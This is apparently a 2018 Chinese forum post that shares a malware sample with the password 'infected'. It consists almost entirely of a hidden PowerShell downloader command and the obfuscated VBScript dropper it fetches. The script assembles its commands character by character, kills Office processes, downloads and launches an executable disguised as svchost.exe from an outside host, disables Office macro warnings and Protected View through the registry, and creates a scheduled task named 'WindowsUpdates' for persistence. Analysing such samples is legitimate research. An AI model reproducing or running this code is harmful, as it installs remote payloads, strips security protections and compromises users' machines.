本帖最后由 remiliacn 于 2018-2-10 11:31 编辑
主程序在这里!
解压密码:infected
执行命令:
- cmd.exe /c powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http://fast-cargo.com/images/file/vb/38.vbs','%Public%\\svchost32.vbs');Start-Process '%Public%\\svchost32.vbs'
复制代码
- Set shhh = CreateObject("WScript.Shell")
- Dim AnwiuWEnhiu3niasmdW1
- Dim AnwiuWEnhiu3niasmdW2
- Dim AnwiuWEnhiu3niasmdW3
- Dim AnwiuWEnhiu3niasmdW4
- Dim AnwiuWEnhiu3niasmdW5
- Dim AnwiuWEnhiu3niasmdW6
- Dim AnwiuWEnhiu3niasmdW7
- Dim AnwiuWEnhiu3niasmdW8
- Dim AnwiuWEnhiu3niasmdW9
- Dim AnwiuWEnhiu3niasmdW010
- Dim AnwiuWEnhiu3niasmdW011
-
- AnwiuWEnhiu3niasmdW1 = "c"
- AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "m"
- AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "d"
- AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "."
- AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "e"
- AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "x"
- AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "e "
- AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "/"
- AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "K "
- AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "t"
- AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "a"
- AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "s"
- AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "k"
- AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "k"
- AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "i"
- AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "l"
- AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "l "
- AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "/"
- AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "f "
- AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "/"
- AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "i"
- AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "m "
- AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "w"
- AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "i"
- AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "n"
- AnwiuWEnhiu3niasmdW2 = "w"
- AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "o"
- AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "r"
- AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "d"
- AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "."
- AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "e"
- AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "x"
- AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "e"
- AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "&"
- AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "t"
- AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "a"
- AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "s"
- AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "k"
- AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "k"
- AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "i"
- AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "l"
- AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "l "
- AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "/"
- AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "f "
- AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "/"
- AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "i"
- AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "m "
- AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "E"
- AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "x"
- AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "c"
- AnwiuWEnhiu3niasmdW3 = "e"
- AnwiuWEnhiu3niasmdW3 = AnwiuWEnhiu3niasmdW3 & "l"
- AnwiuWEnhiu3niasmdW3 = AnwiuWEnhiu3niasmdW3 & "."
- AnwiuWEnhiu3niasmdW3 = AnwiuWEnhiu3niasmdW3 & "e"
- AnwiuWEnhiu3niasmdW3 = AnwiuWEnhiu3niasmdW3 & "x"
- AnwiuWEnhiu3niasmdW3 = AnwiuWEnhiu3niasmdW3 & "e"
- AnwiuWEnhiu3niasmdW4 = "&"
- AnwiuWEnhiu3niasmdW4 = AnwiuWEnhiu3niasmdW4 & "P"
- AnwiuWEnhiu3niasmdW4 = AnwiuWEnhiu3niasmdW4 & "o"
- AnwiuWEnhiu3niasmdW4 = AnwiuWEnhiu3niasmdW4 & "w"
- AnwiuWEnhiu3niasmdW4 = AnwiuWEnhiu3niasmdW4 & "e"
- AnwiuWEnhiu3niasmdW4 = AnwiuWEnhiu3niasmdW4 & "r"
- AnwiuWEnhiu3niasmdW4 = AnwiuWEnhiu3niasmdW4 & "S"
- AnwiuWEnhiu3niasmdW4 = AnwiuWEnhiu3niasmdW4 & "h"
- AnwiuWEnhiu3niasmdW4 = AnwiuWEnhiu3niasmdW4 & "e"
- AnwiuWEnhiu3niasmdW5 = "l"
- AnwiuWEnhiu3niasmdW5 = AnwiuWEnhiu3niasmdW5 & "l "
- AnwiuWEnhiu3niasmdW5 = AnwiuWEnhiu3niasmdW5 & "("
- AnwiuWEnhiu3niasmdW5 = AnwiuWEnhiu3niasmdW5 & "N"
- AnwiuWEnhiu3niasmdW5 = AnwiuWEnhiu3niasmdW5 & "e"
- AnwiuWEnhiu3niasmdW5 = AnwiuWEnhiu3niasmdW5 & "w"
- AnwiuWEnhiu3niasmdW5 = AnwiuWEnhiu3niasmdW5 & "-"
- AnwiuWEnhiu3niasmdW5 = AnwiuWEnhiu3niasmdW5 & "O"
- AnwiuWEnhiu3niasmdW5 = AnwiuWEnhiu3niasmdW5 & "b"
- AnwiuWEnhiu3niasmdW5 = AnwiuWEnhiu3niasmdW5 & "j"
- AnwiuWEnhiu3niasmdW5 = AnwiuWEnhiu3niasmdW5 & "e"
- AnwiuWEnhiu3niasmdW5 = AnwiuWEnhiu3niasmdW5 & "c"
- AnwiuWEnhiu3niasmdW5 = AnwiuWEnhiu3niasmdW5 & "t "
- AnwiuWEnhiu3niasmdW5 = AnwiuWEnhiu3niasmdW5 & "S"
- AnwiuWEnhiu3niasmdW5 = AnwiuWEnhiu3niasmdW5 & "y"
- AnwiuWEnhiu3niasmdW5 = AnwiuWEnhiu3niasmdW5 & "s"
- AnwiuWEnhiu3niasmdW5 = AnwiuWEnhiu3niasmdW5 & "t"
- AnwiuWEnhiu3niasmdW5 = AnwiuWEnhiu3niasmdW5 & "e"
- AnwiuWEnhiu3niasmdW6 = "m"
- AnwiuWEnhiu3niasmdW6 = AnwiuWEnhiu3niasmdW6 & "."
- AnwiuWEnhiu3niasmdW6 = AnwiuWEnhiu3niasmdW6 & "N"
- AnwiuWEnhiu3niasmdW6 = AnwiuWEnhiu3niasmdW6 & "e"
- AnwiuWEnhiu3niasmdW6 = AnwiuWEnhiu3niasmdW6 & "t"
- AnwiuWEnhiu3niasmdW6 = AnwiuWEnhiu3niasmdW6 & "."
- AnwiuWEnhiu3niasmdW6 = AnwiuWEnhiu3niasmdW6 & "W"
- AnwiuWEnhiu3niasmdW6 = AnwiuWEnhiu3niasmdW6 & "e"
- AnwiuWEnhiu3niasmdW6 = AnwiuWEnhiu3niasmdW6 & "b"
- AnwiuWEnhiu3niasmdW6 = AnwiuWEnhiu3niasmdW6 & "C"
- AnwiuWEnhiu3niasmdW6 = AnwiuWEnhiu3niasmdW6 & "l"
- AnwiuWEnhiu3niasmdW6 = AnwiuWEnhiu3niasmdW6 & "i"
- AnwiuWEnhiu3niasmdW6 = AnwiuWEnhiu3niasmdW6 & "e"
- AnwiuWEnhiu3niasmdW6 = AnwiuWEnhiu3niasmdW6 & "n"
- AnwiuWEnhiu3niasmdW6 = AnwiuWEnhiu3niasmdW6 & "t"
- AnwiuWEnhiu3niasmdW6 = AnwiuWEnhiu3niasmdW6 & ")"
- AnwiuWEnhiu3niasmdW6 = AnwiuWEnhiu3niasmdW6 & "."
- AnwiuWEnhiu3niasmdW7 = "D"
- AnwiuWEnhiu3niasmdW7 = AnwiuWEnhiu3niasmdW7 & "o"
- AnwiuWEnhiu3niasmdW7 = AnwiuWEnhiu3niasmdW7 & "w"
- AnwiuWEnhiu3niasmdW7 = AnwiuWEnhiu3niasmdW7 & "n"
- AnwiuWEnhiu3niasmdW7 = AnwiuWEnhiu3niasmdW7 & "l"
- AnwiuWEnhiu3niasmdW7 = AnwiuWEnhiu3niasmdW7 & "o"
- AnwiuWEnhiu3niasmdW7 = AnwiuWEnhiu3niasmdW7 & "a"
- AnwiuWEnhiu3niasmdW7 = AnwiuWEnhiu3niasmdW7 & "d"
- AnwiuWEnhiu3niasmdW7 = AnwiuWEnhiu3niasmdW7 & "F"
- AnwiuWEnhiu3niasmdW7 = AnwiuWEnhiu3niasmdW7 & "i"
- AnwiuWEnhiu3niasmdW7 = AnwiuWEnhiu3niasmdW7 & "l"
- AnwiuWEnhiu3niasmdW7 = AnwiuWEnhiu3niasmdW7 & "e"
- AnwiuWEnhiu3niasmdW7 = AnwiuWEnhiu3niasmdW7 & "("
- AnwiuWEnhiu3niasmdW7 = AnwiuWEnhiu3niasmdW7 & "'http://fast-cargo.com/images/file/vb/exe/38.exe'"
- AnwiuWEnhiu3niasmdW8 = ","
- AnwiuWEnhiu3niasmdW8 = AnwiuWEnhiu3niasmdW8 & "'"
- AnwiuWEnhiu3niasmdW8 = AnwiuWEnhiu3niasmdW8 & "%"
- AnwiuWEnhiu3niasmdW8 = AnwiuWEnhiu3niasmdW8 & "P"
- AnwiuWEnhiu3niasmdW8 = AnwiuWEnhiu3niasmdW8 & "u"
- AnwiuWEnhiu3niasmdW8 = AnwiuWEnhiu3niasmdW8 & "b"
- AnwiuWEnhiu3niasmdW8 = AnwiuWEnhiu3niasmdW8 & "l"
- AnwiuWEnhiu3niasmdW8 = AnwiuWEnhiu3niasmdW8 & "i"
- AnwiuWEnhiu3niasmdW8 = AnwiuWEnhiu3niasmdW8 & "c"
- AnwiuWEnhiu3niasmdW8 = AnwiuWEnhiu3niasmdW8 & "%"
- AnwiuWEnhiu3niasmdW8 = AnwiuWEnhiu3niasmdW8 & ""
- AnwiuWEnhiu3niasmdW8 = AnwiuWEnhiu3niasmdW8 & "s"
- AnwiuWEnhiu3niasmdW9 = "v"
- AnwiuWEnhiu3niasmdW9 = AnwiuWEnhiu3niasmdW9 & "c"
- AnwiuWEnhiu3niasmdW9 = AnwiuWEnhiu3niasmdW9 & "h"
- AnwiuWEnhiu3niasmdW9 = AnwiuWEnhiu3niasmdW9 & "o"
- AnwiuWEnhiu3niasmdW9 = AnwiuWEnhiu3niasmdW9 & "s"
- AnwiuWEnhiu3niasmdW9 = AnwiuWEnhiu3niasmdW9 & "t"
- AnwiuWEnhiu3niasmdW9 = AnwiuWEnhiu3niasmdW9 & "."
- AnwiuWEnhiu3niasmdW9 = AnwiuWEnhiu3niasmdW9 & "e"
- AnwiuWEnhiu3niasmdW9 = AnwiuWEnhiu3niasmdW9 & "x"
- AnwiuWEnhiu3niasmdW9 = AnwiuWEnhiu3niasmdW9 & "e"
- AnwiuWEnhiu3niasmdW9 = AnwiuWEnhiu3niasmdW9 & "'"
- AnwiuWEnhiu3niasmdW9 = AnwiuWEnhiu3niasmdW9 & ")"
- AnwiuWEnhiu3niasmdW9 = AnwiuWEnhiu3niasmdW9 & ";"
- AnwiuWEnhiu3niasmdW9 = AnwiuWEnhiu3niasmdW9 & "S"
- AnwiuWEnhiu3niasmdW9 = AnwiuWEnhiu3niasmdW9 & "t"
- AnwiuWEnhiu3niasmdW9 = AnwiuWEnhiu3niasmdW9 & "a"
- AnwiuWEnhiu3niasmdW9 = AnwiuWEnhiu3niasmdW9 & "r"
- AnwiuWEnhiu3niasmdW9 = AnwiuWEnhiu3niasmdW9 & "t"
- AnwiuWEnhiu3niasmdW9 = AnwiuWEnhiu3niasmdW9 & "-"
- AnwiuWEnhiu3niasmdW010 = "P"
- AnwiuWEnhiu3niasmdW010 = AnwiuWEnhiu3niasmdW010 & "r"
- AnwiuWEnhiu3niasmdW010 = AnwiuWEnhiu3niasmdW010 & "o"
- AnwiuWEnhiu3niasmdW010 = AnwiuWEnhiu3niasmdW010 & "c"
- AnwiuWEnhiu3niasmdW010 = AnwiuWEnhiu3niasmdW010 & "e"
- AnwiuWEnhiu3niasmdW010 = AnwiuWEnhiu3niasmdW010 & "s"
- AnwiuWEnhiu3niasmdW010 = AnwiuWEnhiu3niasmdW010 & "s "
- AnwiuWEnhiu3niasmdW010 = AnwiuWEnhiu3niasmdW010 & "'"
- AnwiuWEnhiu3niasmdW010 = AnwiuWEnhiu3niasmdW010 & "%"
- AnwiuWEnhiu3niasmdW010 = AnwiuWEnhiu3niasmdW010 & "P"
- AnwiuWEnhiu3niasmdW010 = AnwiuWEnhiu3niasmdW010 & "u"
- AnwiuWEnhiu3niasmdW010 = AnwiuWEnhiu3niasmdW010 & "b"
- AnwiuWEnhiu3niasmdW010 = AnwiuWEnhiu3niasmdW010 & "l"
- AnwiuWEnhiu3niasmdW010 = AnwiuWEnhiu3niasmdW010 & "i"
- AnwiuWEnhiu3niasmdW010 = AnwiuWEnhiu3niasmdW010 & "c"
- AnwiuWEnhiu3niasmdW011 = "%"
- AnwiuWEnhiu3niasmdW011 = AnwiuWEnhiu3niasmdW011 & ""
- AnwiuWEnhiu3niasmdW011 = AnwiuWEnhiu3niasmdW011 & "s"
- AnwiuWEnhiu3niasmdW011 = AnwiuWEnhiu3niasmdW011 & "v"
- AnwiuWEnhiu3niasmdW011 = AnwiuWEnhiu3niasmdW011 & "c"
- AnwiuWEnhiu3niasmdW011 = AnwiuWEnhiu3niasmdW011 & "h"
- AnwiuWEnhiu3niasmdW011 = AnwiuWEnhiu3niasmdW011 & "o"
- AnwiuWEnhiu3niasmdW011 = AnwiuWEnhiu3niasmdW011 & "s"
- AnwiuWEnhiu3niasmdW011 = AnwiuWEnhiu3niasmdW011 & "t"
- AnwiuWEnhiu3niasmdW011 = AnwiuWEnhiu3niasmdW011 & "."
- AnwiuWEnhiu3niasmdW011 = AnwiuWEnhiu3niasmdW011 & "e"
- AnwiuWEnhiu3niasmdW011 = AnwiuWEnhiu3niasmdW011 & "x"
- AnwiuWEnhiu3niasmdW011 = AnwiuWEnhiu3niasmdW011 & "e"
- AnwiuWEnhiu3niasmdW011 = AnwiuWEnhiu3niasmdW011 & "'"
- AnwiuWEnhiu3niasmdW12 = AnwiuWEnhiu3niasmdW1 + AnwiuWEnhiu3niasmdW2 + AnwiuWEnhiu3niasmdW3 + AnwiuWEnhiu3niasmdW4 + AnwiuWEnhiu3niasmdW5 + AnwiuWEnhiu3niasmdW6 + AnwiuWEnhiu3niasmdW7 + AnwiuWEnhiu3niasmdW8 + AnwiuWEnhiu3niasmdW9 + AnwiuWEnhiu3niasmdW010 + AnwiuWEnhiu3niasmdW011
- shhh.Run AnwiuWEnhiu3niasmdW12, vbHide
- Set wso = CreateObject("WScript.Shell")
- wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
- set shhh = CreateObject("WScript.Shell")
- Dim AnwiuWEnhiu3niasmdWtime
- AnwiuWEnhiu3niasmdWtime = "SchTasks /Create /sc MINUTE /MO 200 /TN WindowsUpdates /TR C:\\Users\\Public\\svchost32.vbs"
- shhh.run AnwiuWEnhiu3niasmdWtime, vbHide
- set shhh = CreateObject("WScript.Shell")
- Dim DLOTO
- DLOTO = "schtasks /delete /tn WindowsUpdate /F"
- shhh.run DLOTO, vbHide
- Set shhh = CreateObject("WScript.Shell")
- Dim ASnWnQ2Q87WmxW291DXnw4
- Dim ASnWnQ2Q87WmxW291DXnw5
- Dim ASnWnQ2Q87WmxW291DXnw6
- Dim ASnWnQ2Q87WmxW291DXnw7
- Dim ASnWnQ2Q87WmxW291DXnw8
- Dim ASnWnQ2Q87WmxW291DXnw9
- Dim ASnWnQ2Q87WmxW291DXnw010
- Dim ASnWnQ2Q87WmxW291DXnw011
-
- ASnWnQ2Q87WmxW291DXnw4 = ASnWnQ2Q87WmxW291DXnw4 & "P"
- ASnWnQ2Q87WmxW291DXnw4 = ASnWnQ2Q87WmxW291DXnw4 & "o"
- ASnWnQ2Q87WmxW291DXnw4 = ASnWnQ2Q87WmxW291DXnw4 & "w"
- ASnWnQ2Q87WmxW291DXnw4 = ASnWnQ2Q87WmxW291DXnw4 & "e"
- ASnWnQ2Q87WmxW291DXnw4 = ASnWnQ2Q87WmxW291DXnw4 & "r"
- ASnWnQ2Q87WmxW291DXnw4 = ASnWnQ2Q87WmxW291DXnw4 & "S"
- ASnWnQ2Q87WmxW291DXnw4 = ASnWnQ2Q87WmxW291DXnw4 & "h"
- ASnWnQ2Q87WmxW291DXnw4 = ASnWnQ2Q87WmxW291DXnw4 & "e"
- ASnWnQ2Q87WmxW291DXnw5 = "l"
- ASnWnQ2Q87WmxW291DXnw5 = ASnWnQ2Q87WmxW291DXnw5 & "l "
- ASnWnQ2Q87WmxW291DXnw5 = ASnWnQ2Q87WmxW291DXnw5 & "("
- ASnWnQ2Q87WmxW291DXnw5 = ASnWnQ2Q87WmxW291DXnw5 & "N"
- ASnWnQ2Q87WmxW291DXnw5 = ASnWnQ2Q87WmxW291DXnw5 & "e"
- ASnWnQ2Q87WmxW291DXnw5 = ASnWnQ2Q87WmxW291DXnw5 & "w"
- ASnWnQ2Q87WmxW291DXnw5 = ASnWnQ2Q87WmxW291DXnw5 & "-"
- ASnWnQ2Q87WmxW291DXnw5 = ASnWnQ2Q87WmxW291DXnw5 & "O"
- ASnWnQ2Q87WmxW291DXnw5 = ASnWnQ2Q87WmxW291DXnw5 & "b"
- ASnWnQ2Q87WmxW291DXnw5 = ASnWnQ2Q87WmxW291DXnw5 & "j"
- ASnWnQ2Q87WmxW291DXnw5 = ASnWnQ2Q87WmxW291DXnw5 & "e"
- ASnWnQ2Q87WmxW291DXnw5 = ASnWnQ2Q87WmxW291DXnw5 & "c"
- ASnWnQ2Q87WmxW291DXnw5 = ASnWnQ2Q87WmxW291DXnw5 & "t "
- ASnWnQ2Q87WmxW291DXnw5 = ASnWnQ2Q87WmxW291DXnw5 & "S"
- ASnWnQ2Q87WmxW291DXnw5 = ASnWnQ2Q87WmxW291DXnw5 & "y"
- ASnWnQ2Q87WmxW291DXnw5 = ASnWnQ2Q87WmxW291DXnw5 & "s"
- ASnWnQ2Q87WmxW291DXnw5 = ASnWnQ2Q87WmxW291DXnw5 & "t"
- ASnWnQ2Q87WmxW291DXnw5 = ASnWnQ2Q87WmxW291DXnw5 & "e"
- ASnWnQ2Q87WmxW291DXnw6 = "m"
- ASnWnQ2Q87WmxW291DXnw6 = ASnWnQ2Q87WmxW291DXnw6 & "."
- ASnWnQ2Q87WmxW291DXnw6 = ASnWnQ2Q87WmxW291DXnw6 & "N"
- ASnWnQ2Q87WmxW291DXnw6 = ASnWnQ2Q87WmxW291DXnw6 & "e"
- ASnWnQ2Q87WmxW291DXnw6 = ASnWnQ2Q87WmxW291DXnw6 & "t"
- ASnWnQ2Q87WmxW291DXnw6 = ASnWnQ2Q87WmxW291DXnw6 & "."
- ASnWnQ2Q87WmxW291DXnw6 = ASnWnQ2Q87WmxW291DXnw6 & "W"
- ASnWnQ2Q87WmxW291DXnw6 = ASnWnQ2Q87WmxW291DXnw6 & "e"
- ASnWnQ2Q87WmxW291DXnw6 = ASnWnQ2Q87WmxW291DXnw6 & "b"
- ASnWnQ2Q87WmxW291DXnw6 = ASnWnQ2Q87WmxW291DXnw6 & "C"
- ASnWnQ2Q87WmxW291DXnw6 = ASnWnQ2Q87WmxW291DXnw6 & "l"
- ASnWnQ2Q87WmxW291DXnw6 = ASnWnQ2Q87WmxW291DXnw6 & "i"
- ASnWnQ2Q87WmxW291DXnw6 = ASnWnQ2Q87WmxW291DXnw6 & "e"
- ASnWnQ2Q87WmxW291DXnw6 = ASnWnQ2Q87WmxW291DXnw6 & "n"
